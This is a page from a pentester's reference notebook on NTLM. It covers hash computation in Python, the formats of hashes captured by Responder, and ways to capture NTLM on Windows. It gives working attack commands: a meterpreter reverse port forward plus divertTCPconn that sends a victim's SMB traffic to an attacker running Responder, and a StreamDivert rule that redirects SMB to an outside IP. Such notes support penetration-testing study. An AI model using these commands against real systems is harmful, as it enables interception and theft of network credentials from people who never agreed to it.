NTLM - Pentester's Promiscuous Notebook

NTLM

NT / LM Hashes

​https://blog.redforce.io/windows-authentication-and-attacks-part-1-ntlm/​
Calculate NTLM
​https://www.browserling.com/tools/ntlm-hash​
With Python:
>>> import hashlib
>>> hashlib.new('md4', 'Passw0rd!'.encode('utf-16le')).hexdigest()
Responder Capture Structure
​https://github.com/lgandx/Responder/blob/eb449bb061a8eb3944b96b157de73dea444ec46b/servers/SMB.py#L149​
​https://ru.wikipedia.org/wiki/NTLMv2#NTLMv2​
​https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/cheatsheet/​
Andrei Miroshnikov. Windows Security Monitoring: Scenarios and Patterns, Part III, pp. 330-333.
[SMB] NTLMv1 Hash and [SMB] NTLMv1-SSP Hash capture structure:
<Username>:<Domain>:<LMv1_Response>:<NTv1_Response>:<Server_Challenge>
[SMB] NTLMv2-SSP Hash capture structure:
<Username>:<Domain>:<Server_Challenge>:<LMv2_Response>:<NTv2_Response>
Capture NTLM on Windows
​https://reqrypt.org/windivert.html​
​https://github.com/basil00/Divert​
​https://googleprojectzero.blogspot.com/2021/08/understanding-network-access-windows-app.html​
DivertTCPconn
​https://github.com/Arno0x/DivertTCPconn​
Divert incoming SMB traffic on Victim to Victim's local port 8445, sent it through a reverse-forwarded port (meterpreter session must be elevated) to Attacker's local 445 port and capture the hashes with Responder:
$ sudo ./Responder.py -I eth0 -Av
meterpreter > portfwd add -R -L 127.0.0.1 -l 445 -p 8445
meterpreter > execute -f divertTCPconn.exe -a "445 8445"
StreamDivert
​https://github.com/jellever/StreamDivert​
Divert all inbound TCP connections to port 445 (SMB) coming from 192.168.1.11 to 10.10.13.37 port 445:
Cmd > powershell -c "Add-Content conf.txt 'tcp < 445 192.168.1.11 -> 10.10.13.37 445'"
Cmd > .\StreamDivert.exe .\conf.txt -f -v

LDAP

NTLM Relay

Last modified 2mo ago

Copy link

Outline

Calculate NTLM

Responder Capture Structure

Capture NTLM on Windows

DivertTCPconn

StreamDivert